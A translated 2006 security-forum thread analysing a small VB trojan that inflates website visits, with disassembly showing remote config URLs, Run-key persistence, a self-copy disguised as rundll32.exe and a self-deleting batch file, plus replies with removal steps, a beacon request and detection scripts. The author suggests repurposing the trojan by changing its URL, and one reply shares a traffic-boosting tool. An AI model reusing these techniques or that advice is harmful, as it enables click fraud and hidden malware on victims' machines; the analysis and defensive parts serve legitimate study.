[Original] Analysis of a small trojan that inflates website visit counts
Article title: [Original] Analysis of a small trojan that inflates website visit counts
混世魔王, posted 2006-08-16 10:18 [OP]
Author: 混世魔王
Source: EvilOctal Information Security Team (www.eviloctal.com)
All system patches applied, idly browsing the web, and I still got hit by a web trojan, sigh. Now... I downloaded his web trojan. Not bad, really impressive: it runs on 98, NT, 2000, XP, XP SP2 and 2003. I kept it for myself and casually analyzed his trojan. A traffic-inflating trojan. I'm impressed. Small trojans have come this far now.
Unpacking omitted; written in VB.
00403DAD  . FF1554104000  CALL DWORD PTR DS:[<&msvbvm60.__vbaHresu>  ; msvbvm60.__vbaHresultCheckObj
00403DB3  . 8985E0FCFFFF  MOV DWORD PTR SS:[EBP-320],EAX
00403DB9  . EB0A          JMP SHORT Rundll32.00403DC5
00403DBB  > C785E0FCFFFF> MOV DWORD PTR SS:[EBP-320],0
00403DC5  > 8B9560FEFFFF  MOV EDX,DWORD PTR SS:[EBP-1A0]
00403DCB  . 8995F8FCFFFF  MOV DWORD PTR SS:[EBP-308],EDX
00403DD1  . C78560FEFFFF> MOV DWORD PTR SS:[EBP-1A0],0
00403DDB  . 8B85F8FCFFFF  MOV EAX,DWORD PTR SS:[EBP-308]
00403DE1  . 898534FEFFFF  MOV DWORD PTR SS:[EBP-1CC],EAX
00403DE7  . C7852CFEFFFF> MOV DWORD PTR SS:[EBP-1D4],8
00403DF1  . 8D952CFEFFFF  LEA EDX,DWORD PTR SS:[EBP-1D4]
00403DF7  . 8D8DF8FEFFFF  LEA ECX,DWORD PTR SS:[EBP-108]
00403DFD  . FF1508104000  CALL DWORD PTR DS:[<&msvbvm60.__vbaVarMo>  ; msvbvm60.__vbaVarMove
00403E03  . C745FC06000>  MOV DWORD PTR SS:[EBP-4],6
00403E0A  . C785D4FDFFFF> MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>  ; UNICODE "http://www.xxxxxxxx.com/tc/adset.txt"
00403E14  . C785CCFDFFFF> MOV DWORD PTR SS:[EBP-234],8
00403E1E  . 8D95CCFDFFFF  LEA EDX,DWORD PTR SS:[EBP-234]
00403E24  . 8D4DA0        LEA ECX,DWORD PTR SS:[EBP-60]
00403E27  . FF1570114000  CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>  ; msvbvm60.__vbaVarCopy
00403E2D  . C745FC07000>  MOV DWORD PTR SS:[EBP-4],7
00403E34  . C785D4FDFFFF> MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>  ; UNICODE "http://www.xxxxxxxx.com/tc/adlist.txt"
00403E3E  . C785CCFDFFFF> MOV DWORD PTR SS:[EBP-234],8
00403E48  . 8D95CCFDFFFF  LEA EDX,DWORD PTR SS:[EBP-234]
00403E4E  . 8D8D6CFFFFFF  LEA ECX,DWORD PTR SS:[EBP-94]
00403E54  . FF1570114000  CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>  ; msvbvm60.__vbaVarCopy
00403E5A  . C745FC08000>  MOV DWORD PTR SS:[EBP-4],8
00403E61  . C785D4FDFFFF> MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>  ; UNICODE "http://www.xxxxxxxx.com/tc/MMResult.asp"
00403E6B  . C785CCFDFFFF> MOV DWORD PTR SS:[EBP-234],8
00403E75  . 8D95CCFDFFFF  LEA EDX,DWORD PTR SS:[EBP-234]
00403E7B  . 8D4D8C        LEA ECX,DWORD PTR SS:[EBP-74]
00403E7E  . FF1570114000  CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>  ; msvbvm60.__vbaVarCopy
00403E84  . C745FC09000>  MOV DWORD PTR SS:[EBP-4],9
00403E8B  . C785D4FDFFFF> MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>  ; UNICODE "http://www.xxxxxxxx.com/tc/adiepage.txt"
00403E95  . C785CCFDFFFF> MOV DWORD PTR SS:[EBP-234],8
00403E9F  . 8D95CCFDFFFF  LEA EDX,DWORD PTR SS:[EBP-234]
00403EA5  . 8D8DB8FEFFFF  LEA ECX,DWORD PTR SS:[EBP-148]
00403EAB  . FF1570114000  CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>  ; msvbvm60.__vbaVarCopy
00403EB1  . C745FC0A000>  MOV DWORD PTR SS:[EBP-4],0A
00403EB8  . C785D4FDFFFF> MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>  ; UNICODE "http://www.xxxxxxxx.com/tc/ieFavorites.txt"
00403EC2  . C785CCFDFFFF> MOV DWORD PTR SS:[EBP-234],8
00403ECC  . 8D95CCFDFFFF  LEA EDX,DWORD PTR SS:[EBP-234]
00403ED2  . 8D8D7CFFFFFF  LEA ECX,DWORD PTR SS:[EBP-84]
00403ED8  . FF1570114000  CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>  ; msvbvm60.__vbaVarCopy
00403EDE  . C745FC0B000>  MOV DWORD PTR SS:[EBP-4],0B
00403EE5  . C785D4FDFFFF> MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>  ; UNICODE "WinDir"
00403EEF  . C785CCFDFFFF> MOV DWORD PTR SS:[EBP-234],8
00403EF9  . 8D95CCFDFFFF  LEA EDX,DWORD PTR SS:[EBP-234]
00403EFF  . 8D8D2CFEFFFF  LEA ECX,DWORD PTR SS:[EBP-1D4]
00403F05  . FF156C114000  CALL DWORD PTR DS:[<&msvbvm60.__vbaVarDu>  ; msvbvm60.__vbaVarDup
00403F0B  . 8D8D2CFEFFFF  LEA ECX,DWORD PTR SS:[EBP-1D4]
00403F11  . 51            PUSH ECX
00403F12  . 8D951CFEFFFF  LEA EDX,DWORD PTR SS:[EBP-1E4]
00403F18  . 52            PUSH EDX
00403F19  . FF1560104000  CALL DWORD PTR DS:[<&msvbvm60.rtcEnviron>  ; msvbvm60.rtcEnvironVar
00403F1F  . C785C4FDFFFF> MOV DWORD PTR SS:[EBP-23C],Rundll32.0040>  ; UNICODE "\rundll32.exe"
00403F29  . C785BCFDFFFF> MOV DWORD PTR SS:[EBP-244],8
The program reads its configuration files from the tc directory on http://www.xxxxxxxx.com, and at the same time visits tc/MMResult.asp.
Generating the file:
00404DA2  ./EB0A          JMP SHORT Rundll32.00404DAE  // get the file path (stack)
00404DA4  >|C78588FCFFFF> MOV DWORD PTR SS:[EBP-378],0
00404DAE  >\8B8560FEFFFF  MOV EAX,DWORD PTR SS:[EBP-1A0]  // my program's path is "D:\fuckyou"
00404DB4  . 50            PUSH EAX  // path into EAX
00404DB5  . 6880274000    PUSH Rundll32.00402780  ; // generates killme.bat
00404DBA  . FF1548104000  CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>  ; msvbvm60.__vbaStrCat
00404DC0  . 8BD0          MOV EDX,EAX  // file path + file name: D:\fuckyou\killme.bat
00404DC2  . 8D8D5CFEFFFF  LEA ECX,DWORD PTR SS:[EBP-1A4]
00404DC8  . FF1580114000  CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>  ; msvbvm60.__vbaStrMove
00404DCE  . 50            PUSH EAX
00404DCF  . 6A01          PUSH 1
00404DD1  . 6AFF          PUSH -1
00404DD3  . 6A02          PUSH 2
00404DD5  . FF1528114000  CALL DWORD PTR DS:[<&msvbvm60.__vbaFileOp>  ; msvbvm60.__vbaFileOpen
00404DDB  . 8D8D5CFEFFFF  LEA ECX,DWORD PTR SS:[EBP-1A4]
00404DE1  . 51            PUSH ECX
00404DE2  . 8D9560FEFFFF  LEA EDX,DWORD PTR SS:[EBP-1A0]
00404DE8  . 52            PUSH EDX
00404DE9  . 6A02          PUSH 2
00404DEB  . FF1548114000  CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeSt>  ; msvbvm60.__vbaFreeStrList
00404DF1  . 83C40C        ADD ESP,0C
00404DF4  . 8D8D40FEFFFF  LEA ECX,DWORD PTR SS:[EBP-1C0]
00404DFA  . FF15A8114000  CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeOb>  ; msvbvm60.__vbaFreeObj
00404E00  . C745FC23000>  MOV DWORD PTR SS:[EBP-4],23
00404E07  . 689C274000    PUSH Rundll32.0040279C  ; @echo off
00404E0C  . 6A01          PUSH 1
00404E0E  . 68B4274000    PUSH Rundll32.004027B4
00404E13  . FF15F8104000  CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>  ; msvbvm60.__vbaPrintFile
00404E19  . 83C40C        ADD ESP,0C
00404E1C  . C745FC24000>  MOV DWORD PTR SS:[EBP-4],24
00404E23  . 68BC274000    PUSH Rundll32.004027BC  ; sleep 100
00404E28  . 6A01          PUSH 1
00404E2A  . 68B4274000    PUSH Rundll32.004027B4
00404E2F  . FF15F8104000  CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>  ; msvbvm60.__vbaPrintFile
00404E35  . 83C40C        ADD ESP,0C
00404E38  . C745FC25000>  MOV DWORD PTR SS:[EBP-4],25
00404E3F  . 833DA8934000> CMP DWORD PTR DS:[4093A8],0
00404E46  . 751C          JNZ SHORT Rundll32.00404E64
00404E48  . 68A8934000    PUSH Rundll32.004093A8
00404E4D  . 6894254000    PUSH Rundll32.00402594
00404E52  . FF1530114000  CALL DWORD PTR DS:[<&msvbvm60.__vbaNew2>]  ; msvbvm60.__vbaNew2
00404E58  . C78584FCFFFF> MOV DWORD PTR SS:[EBP-37C],Rundll32.00409>
00404E62  . EB0A          JMP SHORT Rundll32.00404E6E
00404E64  > C78584FCFFFF> MOV DWORD PTR SS:[EBP-37C],Rundll32.00409>
00404E6E  > 8B8584FCFFFF  MOV EAX,DWORD PTR SS:[EBP-37C]
00404E74  . 8B08          MOV ECX,DWORD PTR DS:[EAX]
........
00404F1D  . 52            PUSH EDX
00404F1E  . FF1554104000  CALL DWORD PTR DS:[<&msvbvm60.__vbaHresul>  ; msvbvm60.__vbaHresultCheckObj
00404F24  . 89857CFCFFFF  MOV DWORD PTR SS:[EBP-384],EAX
00404F2A  . EB0A          JMP SHORT Rundll32.00404F36
00404F2C  > C7857CFCFFFF> MOV DWORD PTR SS:[EBP-384],0
00404F36  > 68D4274000    PUSH Rundll32.004027D4  ; del
00404F3B  . 8B8560FEFFFF  MOV EAX,DWORD PTR SS:[EBP-1A0]  // the program's file name
00404F41  . 50            PUSH EAX  // file name pushed onto the stack (rundll322)
00404F42  . 68E4274000    PUSH Rundll32.004027E4  ; .exe (rundll322.exe)
00404F47  . FF1548104000  CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>  ; msvbvm60.__vbaStrCat
00404F4D  . 8BD0          MOV EDX,EAX
00404F4F  . 8D8D5CFEFFFF  LEA ECX,DWORD PTR SS:[EBP-1A4]
00404F55  . FF1580114000  CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>  ; msvbvm60.__vbaStrMove
00404F5B  . 50            PUSH EAX
00404F5C  . FF1548104000  CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>  ; msvbvm60.__vbaStrCat
00404F62  . 8BD0          MOV EDX,EAX  // (del rundll322.exe)
00404F64  . 8D8D58FEFFFF  LEA ECX,DWORD PTR SS:[EBP-1A8]
00404F6A  . FF1580114000  CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>  ; msvbvm60.__vbaStrMove
00404F70  . 50            PUSH EAX
00404F71  . 6A01          PUSH 1
00404F73  . 68B4274000    PUSH Rundll32.004027B4
00404F78  . FF15F8104000  CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>  ; msvbvm60.__vbaPrintFile
00404F7E  . 83C40C        ADD ESP,0C
00404F81  . 8D8D58FEFFFF  LEA ECX,DWORD PTR SS:[EBP-1A8]
00404F87  . 51            PUSH ECX
00404F88  . 8D955CFEFFFF  LEA EDX,DWORD PTR SS:[EBP-1A4]
00404F8E  . 52            PUSH EDX
00404F8F  . 8D8560FEFFFF  LEA EAX,DWORD PTR SS:[EBP-1A0]
00404F95  . 50            PUSH EAX
00404F96  . 6A03          PUSH 3
00404F98  . FF1548114000  CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeSt>  ; msvbvm60.__vbaFreeStrList
00404F9E  . 83C410        ADD ESP,10
00404FA1  . 8D8D40FEFFFF  LEA ECX,DWORD PTR SS:[EBP-1C0]
00404FA7  . FF15A8114000  CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeOb>  ; msvbvm60.__vbaFreeObj
00404FAD  . C745FC26000>  MOV DWORD PTR SS:[EBP-4],26
00404FB4  . 68F4274000    PUSH Rundll32.004027F4  ; del killme.bat
00404FB9  . 6A01          PUSH 1
00404FBB  . 68B4274000    PUSH Rundll32.004027B4
00404FC0  . FF15F8104000  CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>  ; msvbvm60.__vbaPrintFile
00404FC6  . 83C40C        ADD ESP,0C
00404FC9  . C745FC27000>  MOV DWORD PTR SS:[EBP-4],27
00404FD0  . 6818284000    PUSH Rundll32.00402818  ; cls
00404FD5  . 6A01          PUSH 1
00404FD7  . 68B4274000    PUSH Rundll32.004027B4
00404FDC  . FF15F8104000  CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>  ; msvbvm60.__vbaPrintFile
00404FE2  . 83C40C        ADD ESP,0C
00404FE5  . C745FC28000>  MOV DWORD PTR SS:[EBP-4],28
00404FEC  . 6824284000    PUSH Rundll32.00402824  ; exit
00404FF1  . 6A01          PUSH 1
00404FF3  . 68B4274000    PUSH Rundll32.004027B4
00404FF8  . FF15F8104000  CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>  ; msvbvm60.__vbaPrintFile
00404FFE  . 83C40C        ADD ESP,0C
00405001  . C745FC29000>  MOV DWORD PTR SS:[EBP-4],29
00405008  . 6A01          PUSH 1
0040500A  . FF15A4104000  CALL DWORD PTR DS:[<&msvbvm60.__vbaFileCl>  ; msvbvm60.__vbaFileClose
00405010  . C745FC2A000>  MOV DWORD PTR SS:[EBP-4],2A
00405017  . 833DA8934000> CMP DWORD PTR DS:[4093A8],0
0040501E  . 751C          JNZ SHORT Rundll32.0040503C
00405020  . 68A8934000    PUSH Rundll32.004093A8
00405025  . 6894254000    PUSH Rundll32.00402594
It generates a batch file that deletes the traces:
killme.bat
echo off
sleep 100
del rundll322.exe
del killme.bat
cls
exit
Simply writes the registry Run key.
004046ED  . BA5C284000    MOV EDX,Rundll32.0040285C  ; software\microsoft\windows\currentversion\run
004046F2  . 8D8D08FFFFFF  LEA ECX,DWORD PTR SS:[EBP-F8]
004046F8  . FF1540114000  CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCop>  ; msvbvm60.__vbaStrCopy
004046FE  . C745FC17000>  MOV DWORD PTR SS:[EBP-4],17
00404705  . C785D4FDFFFF> MOV DWORD PTR SS:[EBP-22C],Rundll32.00402>  ; windir
0040470F  . C785CCFDFFFF> MOV DWORD PTR SS:[EBP-234],8
00404719  . 8D95CCFDFFFF  LEA EDX,DWORD PTR SS:[EBP-234]
0040471F  . 8D8D2CFEFFFF  LEA ECX,DWORD PTR SS:[EBP-1D4]
00404725  . FF156C114000  CALL DWORD PTR DS:[<&msvbvm60.__vbaVarDup>  ; msvbvm60.__vbaVarDup
0040472B  . 8D952CFEFFFF  LEA EDX,DWORD PTR SS:[EBP-1D4]
00404731  . 52            PUSH EDX
00404732  . 8D851CFEFFFF  LEA EAX,DWORD PTR SS:[EBP-1E4]
00404738  . 50            PUSH EAX
00404739  . FF1560104000  CALL DWORD PTR DS:[<&msvbvm60.rtcEnvironV>  ; msvbvm60.rtcEnvironVar
0040473F  . C785C4FDFFFF> MOV DWORD PTR SS:[EBP-23C],Rundll32.00402>  ; \rundll32.exe
Let me just give the summary of the analysis. Copyright by 混世魔王, QQ: 26836659
The program only exists to inflate visit counts. There is no backdoor. It just hides the URL; I have replaced it with XXXX.
After the program runs, your computer visits http://www.xxxxxxxx.com/tc/MMResult.asp
See the code:
' the address is replaced with xxx
' the traffic counter of 站长站 (the webmaster site)
It copies itself to c:/windows/
It generates a batch file that deletes the program that was run from the local directory.
killme.bat
echo off
sleep 100
del rundll322.exe
del killme.bat
cls
exit
The program is started by writing the registry key
software\microsoft\windows\currentversion\run
with the value rundll32.exe
The program is poorly written; if it injected into a process, the effect would be somewhat better.
Just change the URL in his program and this trojan can be used for yourself.
If there are shortcomings, I hope you will point them out.
Writing the program is simple, but I lost the skills a long time ago; I can't write it without cramming, and I have no time to cram.
If anyone who is good at programming writes one, remember to send me a copy. Heh. msn: hsmw26836659@hotmail.com
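The persistence described above (a copy in %windir% named rundll32.exe, registered under the Run key as rundll32.exe) can be checked for from the defender's side. The following is an added example, not code from the post or from the trojan's author; the Run values in SAMPLE_RUN_VALUES are constructed, and on Windows the helper reads the live HKCU Run key instead.

```python
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

# Constructed sample of Run values as (name, command) pairs, modelled on
# the post: the trojan copies itself to %windir% as rundll32.exe and adds
# a Run value named rundll32.exe; the real rundll32.exe lives in system32.
SAMPLE_RUN_VALUES = [
    ("Legit", r"C:\WINDOWS\system32\rundll32.exe shell32.dll,Control_RunDLL"),
    ("rundll32.exe", r"C:\WINDOWS\rundll32.exe"),
    ("Updater", r'"C:\WINDOWS\rundll32.exe" C:\WINDOWS\x.dll,Start'),
]

def exe_of(command: str) -> str:
    """First token of a Run command line, honouring double quotes."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split()[0] if command else ""

def find_lookalike_rundll32(values, windir=r"C:\WINDOWS"):
    """Return (name, exe) for Run entries whose executable is called
    rundll32.exe but is not %windir%\\system32\\rundll32.exe. An
    unqualified 'rundll32.exe' is flagged too: it resolves via PATH,
    and %windir% (where the copy sits) is on PATH."""
    legit = (windir.rstrip("\\") + r"\system32\rundll32.exe").lower()
    hits = []
    for name, command in values:
        exe = exe_of(command).replace("/", "\\")
        if exe.lower().rsplit("\\", 1)[-1] == "rundll32.exe" and exe.lower() != legit:
            hits.append((name, exe))
    return hits

def read_run_values():
    """Live HKCU Run values on Windows; the constructed sample elsewhere."""
    try:
        import winreg
    except ImportError:
        return SAMPLE_RUN_VALUES
    values = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        i = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, i)
            except OSError:  # no more values
                break
            values.append((name, str(data)))
            i += 1
    return values

if __name__ == "__main__":
    for name, exe in find_lookalike_rundll32(read_run_values()):
        print(f"suspicious Run value {name!r} -> {exe}")
```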
kiki, posted 2006-08-16 14:26 [#1]
Yep, this program starts by modifying the Run key.
I recently caught a small trojan too; it also seems to be a traffic booster.
Interestingly, the program is actually named adf.com.cn; in the process list it is the only process with such a strange name. The difference is that it starts as a service, and the service name is also atf.com.cn, which caused a lot of trouble at boot time.
A quick analysis shows that, while running, the program just keeps sending the same HTTP request to a single site:
GET /ip.txt HTTP/1.0
User-Agent: MYURL
Host: ningzi8887.27h.com
Pragma: no-cache
...
First stop the service in the Services manager, or run net stop adf.com.cn
then sc delete adf.com.cn
Then search the registry again and delete everything related to it.
Next go into %windir%, choose to show all files and system files in the Tools options (the file has the system and hidden attributes), and you can see adf.com.cn; delete it directly and reboot.
Now the system boots much faster :)
Looking at how this program behaves, it seems to be toying with us, using such a strange process name; it really isn't afraid of people spotting it!
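The request pattern above (the same GET /ip.txt to one host, non-browser User-Agent "MYURL", repeated endlessly) is easy to spot in proxy logs. This is an added detection example, not from the post; the log lines and their format are constructed, with the host and User-Agent taken from the request shown above.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed proxy-log lines (format assumed: date time client method url "user-agent").
SAMPLE_LOG = """\
2006-08-16 14:20:00 10.0.0.7 GET http://ningzi8887.27h.com/ip.txt "MYURL"
2006-08-16 14:20:01 10.0.0.7 GET http://ningzi8887.27h.com/ip.txt "MYURL"
2006-08-16 14:20:02 10.0.0.7 GET http://ningzi8887.27h.com/ip.txt "MYURL"
2006-08-16 14:20:03 10.0.0.7 GET http://ningzi8887.27h.com/ip.txt "MYURL"
2006-08-16 14:20:04 10.0.0.7 GET http://ningzi8887.27h.com/ip.txt "MYURL"
2006-08-16 14:20:05 10.0.0.9 GET http://www.example.com/index.html "Mozilla/4.0 (compatible; MSIE 6.0)"
2006-08-16 14:25:00 10.0.0.9 GET http://www.example.com/index.html "Mozilla/4.0 (compatible; MSIE 6.0)"
"""

LINE_RE = re.compile(r'^(\S+ \S+) (\S+) (\S+) (\S+) "([^"]*)"$')

def parse(lines):
    """Yield (timestamp, client, method, url, user_agent); skip malformed lines."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        yield ts, m.group(2), m.group(3), m.group(4), m.group(5)

def find_beacons(lines, min_hits=5, window_s=60):
    """Return (client, url, user_agent, total) for every client that repeats
    the identical request at least min_hits times within window_s seconds."""
    by_key = defaultdict(list)
    for ts, client, method, url, ua in parse(lines):
        by_key[(client, method, url, ua)].append(ts)
    hits = []
    for (client, method, url, ua), stamps in by_key.items():
        stamps.sort()
        lo = 0
        for hi, t in enumerate(stamps):          # sliding window over sorted times
            while (t - stamps[lo]).total_seconds() > window_s:
                lo += 1
            if hi - lo + 1 >= min_hits:
                hits.append((client, url, ua, len(stamps)))
                break
    return hits

def odd_user_agents(lines, known_prefixes=("Mozilla/",)):
    """User-Agent strings that look nothing like a browser, e.g. "MYURL"."""
    return sorted({ua for *_, ua in parse(lines) if not ua.startswith(known_prefixes)})
```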
haicao, posted 2006-08-17 08:25 [#2]
I don't know what the intent of the authors of the two programs above was, but if "boosting traffic" means boosting the Alexa rank,
the two methods above simply won't work.
Alexa's statistics are actually extremely inaccurate; they only count IE users who installed the Alexa toolbar.
Remember, it can only count users running Windows and browsing with IE,
but which ordinary person would install that toolbar?
Even if a site has not a single visitor in a day, as long as one visitor with the toolbar installed comes by, the traffic is counted as 100.
So how accurate is that? Our site's actual IP visits are around 3000, but the statistics now show 5500 IPs,
while a while ago the actual IP count was about 1500 and yet the statistic was 9000. Ugh.........
Following my boss's suggestion I also wrote one to try to boost traffic; I'm sharing the source below for friends who need it to study.
Attachment: AlexaWeb.rar (270K), downloads: 253
光芒果, posted 2006-08-17 14:56 [#3]
I think it is for boosting ads; my girlfriend also ran into something similar. I feel it should count as nuisance software, not a trojan.
ybjh, posted 2007-01-11 09:14 [#4]
You can set read-only permissions on the Run key to block access; normally there is no need to keep write permission on it.
(c) Copyleft 2003-2007, EvilOctal Security Team.